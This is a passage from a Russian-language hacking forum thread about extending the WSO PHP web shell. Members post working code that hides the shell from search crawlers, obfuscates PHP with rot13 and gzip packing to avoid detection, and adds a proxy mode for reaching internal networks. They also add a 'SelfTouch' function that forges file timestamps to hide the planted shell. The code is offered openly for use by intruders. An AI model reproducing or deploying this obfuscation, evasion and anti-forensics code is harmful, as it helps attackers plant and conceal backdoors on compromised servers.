Старый 17.02.2014, 13:09   #191
b3
 
Аватар для b3
 
Регистрация: 18.08.2010
Сообщений: 354
Репутация: 105
По умолчанию

Цитата:
вернее теперь могу всёравно невскрыть
наивный... находим твой шелл на серваке элементарными регулярками, правим функцию encode, делаем логирование входящих переменных $str, $p ,$s ждем когда ты заюзаешь шелл и получаем код.
Использование такого кода как:
Цитата:
preg_replace("/.*/e
Цитата:
base64_decode
Как бы за себя говорит что это шелл, придумайте что-то новое, хватить рвать этот баян уже.
Цитата:
echo ini_set
Бесполезная часть кода, почитайте про возвращаемые данные функции ini_set
И опять же session_start(); идет после того как есть вывод...
b3 вне форума   Ответить с цитированием
Старый 03.07.2014, 17:27   #192
HeartLESS
 
Регистрация: 25.04.2012
Сообщений: 101
Репутация: 31
По умолчанию

Хм, добавил прокси режим в WSO...
--> wso.zip <--
Еще на стадии тестирования, но может кто-то более пряморукий чем я допилит неисправности.
Что он умеет:
Цитата:
отправлять запросы во внутренюю сеть
перехватывать ваши же запросы
позволяет редактировать эти запросы
и может отрисовать ответ обратно
Чего он не умеет:
Цитата:
Косячит jquery чуток иногда
XHR лесом
Бывают трабблы с куками или некоторыми пост запросами, так что может быть удобнее использовать его в burp-режиме.
Беда с HTTPS
Не правит перенаправления (сначала я думал их вырезать, но один хрен плохо получается)
без курла пока не работает.
Что делает панелька
Цитата:
перемещается влево-вправо (основная функция хехе)
включает режим перехвата запроса / отключает его
позволяет перейти на новый адрес не возвращаясь к wso.
бесит
мешает
В общем, оно нормально работает на сайтах простых и средней сложности, чем проще, тем лучше.
Изначально создавалось для отправки запросов во внутреннюю сеть.

Как-то так в общем, правки позже или сами делайте, о косяках в личку (ох она переполнится, чувствую)

__________________
Jokester: Ок, с тобой проще согласиться чем переубедить. :)

Последний раз редактировалось HeartLESS; 03.07.2014 в 21:14..
HeartLESS вне форума   Ответить с цитированием
Старый 12.07.2014, 13:18   #193
Levkin
 
Аватар для Levkin
 
Регистрация: 07.02.2014
Сообщений: 8
Репутация: 0
По умолчанию

В скрипте есть код, для псевдо защиты от индексации:
PHP код:
if(!empty($_SERVER['HTTP_USER_AGENT'])) {
    
$userAgents = array("Google""Slurp""MSNBot""ia_archiver""Yandex""Rambler");
    if(
preg_match('/' implode('|'$userAgents) . '/i'$_SERVER['HTTP_USER_AGENT'])) {
        
header('HTTP/1.0 404 Not Found');
        exit;
    }

Почему его не заменят на белый список User-Agent'ов? Хекер ставит расширение User-Agent Switcher и заходит на шелл например с WSO-Agent:
PHP код:
if(!empty($_SERVER['HTTP_USER_AGENT'])) {
    if(
'WSO-Agent' != $_SERVER['HTTP_USER_AGENT'])) {
        
header('HTTP/1.0 404 Not Found');
        exit;
    }

Levkin вне форума   Ответить с цитированием
Старый 12.07.2014, 18:58   #194
Enigma
 
Аватар для Enigma
 
Регистрация: 17.06.2013
Сообщений: 37
Репутация: 12
По умолчанию

Цитата:
Сообщение от Levkin Посмотреть сообщение
В скрипте есть код, для псевдо защиты от индексации:
PHP код:
if(!empty($_SERVER['HTTP_USER_AGENT'])) {
    
$userAgents = array("Google""Slurp""MSNBot""ia_archiver""Yandex""Rambler");
    if(
preg_match('/' implode('|'$userAgents) . '/i'$_SERVER['HTTP_USER_AGENT'])) {
        
header('HTTP/1.0 404 Not Found');
        exit;
    }

Почему его не заменят на белый список User-Agent'ов? Хекер ставит расширение User-Agent Switcher и заходит на шелл например с WSO-Agent:
PHP код:
if(!empty($_SERVER['HTTP_USER_AGENT'])) {
    if(
'WSO-Agent' != $_SERVER['HTTP_USER_AGENT'])) {
        
header('HTTP/1.0 404 Not Found');
        exit;
    }

WSO-Agent это отличная сигнатура) А так это усложнение просто, большей части пользователей не нужно, а те кому нужно могут с легкостью сделать как ты предложил
Enigma вне форума   Ответить с цитированием
Старый 10.10.2014, 18:04   #195
student
 
Регистрация: 20.06.2014
Сообщений: 4
Репутация: 0
По умолчанию

Цитата:
Сообщение от shampoo Посмотреть сообщение
для простоты всё ж оформил в виде веб кода:

PHP код:
<?php

if(isset($_POST['php_code'])) : 

    
header('Content-Disposition: attachment; filename=encoded.php');
    echo 
php_pack($_POST['php_code']);
    exit;

endif;
?>
<html>
<head>
    <title>Simple PHP encoder by shampoo [ https://rdot.org/forum/member.php?u=5032 ]</title>
    <style>
        html, body {font-family: Trebuchet MS; background: #ccc; font-size: 0.8em}
        h1 {color: #222}
        textarea {width: 100%; height: 75%; margin-bottom: 10px}
        input.encode {font-size: 1em; font-weight: bold}
    </style>
</head>
<body>
    <h1>Source PHP code:<h1>
    <form method="post">
        <textarea name="php_code">&lt;?php echo md5(123); ?&gt;</textarea>
        <input class="encode" type="submit" value="encode this shit, plz!" />
    </form>
</body>
</html>
<?php

///
function php_pack($php_code)
{
    
$php_code strip_php_tags($php_code);
    
$placeholder "%PLACEHOLDER%";
    
$text_function 'str_rot13'// maybe sttrev 

    
$unpacker trim("
    <?php 
        \$s="
.quote_string($text_function).";
        \$c0=__FILE__;
        \$f1=\$s("
.quote_string($text_function('gzinflate')).");
        \$f2=\$s("
.quote_string($text_function('file_get_contents')).");
        \$f3=\$s("
.quote_string($text_function('create_function')).");
        \$f4=\$s("
.quote_string($text_function('substr')).");
        \$f5=\$s("
.quote_string($text_function('exit')).");
        \$gz=\$f4(\$f2(\$c0),
{$placeholder});
        \$c=\$f1(\$gz);
        \$f=\$f3('',\$c);
        \$f();
        exit;
    ?>
    "
);

    
$unpacker preg_replace("/(\t+|\r?\n+)/"""$unpacker);
    
$unpacker_length strlen($unpacker) - strlen($placeholder);
    
$unpacker_length_real $unpacker_length strlen(strval($unpacker_length));

    
$unpacker str_replace($placeholder$unpacker_length_real$unpacker);
    return 
$unpacker gzdeflate($php_code);
}


///
function strip_php_tags($php_code)
{
    
$php_code trim($php_code);

    if(
substr($php_code05) == '<?php'
        
$php_code substr($php_code6);

    if(
substr($php_code, -22) == '?>'
        
$php_code substr($php_code0, -2);

    return 
$php_code;
}

function 
quote_string($string$quote "'"$delimiter ".")
{
    
$ret $quote;
    for(
$i=0$i strlen($string); $i++)    
    {
        
$char $string[$i];
        
$char = ($quote == "\"") ? addslashes($char) : $char;

                if(
rand() % == && strlen($ret) > 1)
            
$ret.=$quote $delimiter $quote;

        
$ret.=$char;
    }

    
$ret.=$quote;
    return 
$ret;
}
?>
ни у кого не получилось сделать полностью рабочий wso при помощи этого крипта?
student вне форума   Ответить с цитированием
Старый 05.11.2014, 03:53   #196
omen666
 
Регистрация: 06.09.2014
Сообщений: 64
Репутация: 9
По умолчанию

Здравствуйте! Было бы круто если можно было опционально задавать название для файла при заливке, а также тач соседа(php скрипта, если нет, то другого файла!) Эти действия становятся просто рутинными при каждой заливке хекерам.
omen666 вне форума   Ответить с цитированием
Старый 06.11.2014, 05:04   #197
omen666
 
Регистрация: 06.09.2014
Сообщений: 64
Репутация: 9
По умолчанию

Поиск эксплоита для ядра не работает в шелле!
omen666 вне форума   Ответить с цитированием
Старый 06.11.2014, 22:10   #198
HeartLESS
 
Регистрация: 25.04.2012
Сообщений: 101
Репутация: 31
По умолчанию

Цитата:
Сообщение от omen666 Посмотреть сообщение
Здравствуйте! Было бы круто если можно было опционально задавать название для файла при заливке, а также тач соседа(php скрипта, если нет, то другого файла!) Эти действия становятся просто рутинными при каждой заливке хекерам.
допиши и выложи сюда, в чем проблема?)
__________________
Jokester: Ок, с тобой проще согласиться чем переубедить. :)
HeartLESS вне форума   Ответить с цитированием
Старый 07.11.2014, 14:59   #199
omen666
 
Регистрация: 06.09.2014
Сообщений: 64
Репутация: 9
По умолчанию

Цитата:
Сообщение от HeartLESS Посмотреть сообщение
допиши и выложи сюда, в чем проблема?)
[скачать] пароль root

ln 298
PHP код:
...<span>Upload file:</span>$is_writable<br><input class='toolsInp' type=file name=f><pre>Filename(Optional)<input type=text name=fname></pre><input type=submit value='>>'></form><br  ></td>... 
ln 522
PHP код:
...case 'uploadFile':
                if (!empty(
$_POST['fname'])) 
                    
$fname $_POST['fname']; 
                else 
                    
$fname $_FILES['f']['name'];
                if(!@
move_uploaded_file($_FILES['f']['tmp_name'], $fname))
                    echo 
"Can't upload file!";
                break;... 
ln 262
PHP код:
...$m['Self touch'] = 'SelfTouch';... 
ln 1043
PHP код:
...function actionSelfTouch() {
    
wsoHeader();
    if(
$_POST['p1'] == 'yes') {
        
$all_f wsoScandir($GLOBALS['cwd']);    
        unset(
$all_f[array_search(basename(__FILE__),$all_f)]);
        echo 
'<h1>Touch like!</h1><div class=content>';
        echo 
'<form name=f_touch method=post>';
        echo 
"<pre><input onclick=\"g('SelfTouch',null,'yes',f_touch.timestamp.value)\" type=button value='Touch!'></pre>";
        foreach (
$all_f as $some_f) {    
            
$some_f_t filectime($some_f);
            echo 
"<pre><label><input type=radio name='timestamp' value='$some_f_t'>" '<b>' $some_f '</b>' ' - ' date("F d Y H:i:s.",filectime($some_f)) . "</label></pre>";
        }        
        if(
$_POST['p2']) {
            if(@
touch(basename(__FILE__),$_POST['p2'],$_POST['p2']))
                echo(
'Shell has been touched');
            else {
                echo 
'<h1>Touch</h1><div class=content>Touch error!</div>';
            }
        }
        echo 
'</form>';
        echo 
'</div>';
    }
    if(
$_POST['p1'] != 'yes') {
        echo 
'<h1>Touch</h1><div class=content>Really want to touch the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';
    }
    
wsoFooter();
}... 















Последний раз редактировалось omen666; 08.11.2014 в 08:57.. Причина: обновил ссылку, ps ссылка вечная
omen666 вне форума   Ответить с цитированием
Старый 07.11.2014, 16:51   #200
omen666
 
Регистрация: 06.09.2014
Сообщений: 64
Репутация: 9
По умолчанию

[скачать]

Теперь шелл может тачить себя и свою папку =)

ln 1043
PHP код:
...function actionSelfTouch() {
    
wsoHeader();
    if(
$_POST['p1'] == 'yes') {
        
$all_f wsoScandir($GLOBALS['cwd']);    
        unset(
$all_f[array_search(basename(__FILE__),$all_f)]);
        echo 
'<h1>Touch like</h1><div class=content>';
        echo 
'<form name=f_touch method=post>';
        echo 
'<pre><label><input type=checkbox name=tparent id=tparent><span style="margin-left: 3px;">Touch shell\'s directory</span></label></pre>';
        echo 
"<pre><input onclick=\"g('SelfTouch',null,'yes',f_touch.timestamp.value,document.getElementById('tparent').checked)\" type=button value='Touch!'></pre>";
        foreach (
$all_f as $some_f) {    
            
$some_f_t filectime($some_f);
            echo 
"<pre><label><input type=radio name='timestamp' value='$some_f_t'> " '<b>' $some_f '</b>' ' - ' date("F d Y H:i:s.",filectime($some_f)) . "</label></pre>";
        }        
        if(
$_POST['p2']) {            
            if(@
touch(basename(__FILE__), $_POST['p2'], $_POST['p2'])) {
                echo(
'<p>Shell has been touched</p>');
                if(
$_POST['p3'] == 'true') {
                    @
touch(dirname(__FILE__), $_POST['p2'], $_POST['p2']);
                    echo(
'<p>Shell\'s directory has been touched</p>');                
                }
            }
            else {
                echo 
'<h1>Touch</h1><div class=content>Touch error!</div>';
            }
        }
        echo 
'</form>';
        echo 
'</div>';
    }
    if(
$_POST['p1'] != 'yes') {
        echo 
'<h1>Touch</h1><div class=content>Really want to touch the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';
    }
    
wsoFooter();
}... 










[скачать в2]
Когда много файлов, то результат смотреть неудобно, сделал чтоб вверху выводилось.


Последний раз редактировалось omen666; 08.11.2014 в 08:57.. Причина: обновил ссылку, а вобше посты можно удалить, последний оставить хз
omen666 вне форума   Ответить с цитированием
Ответ

Метки
shell, wso, wso2

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot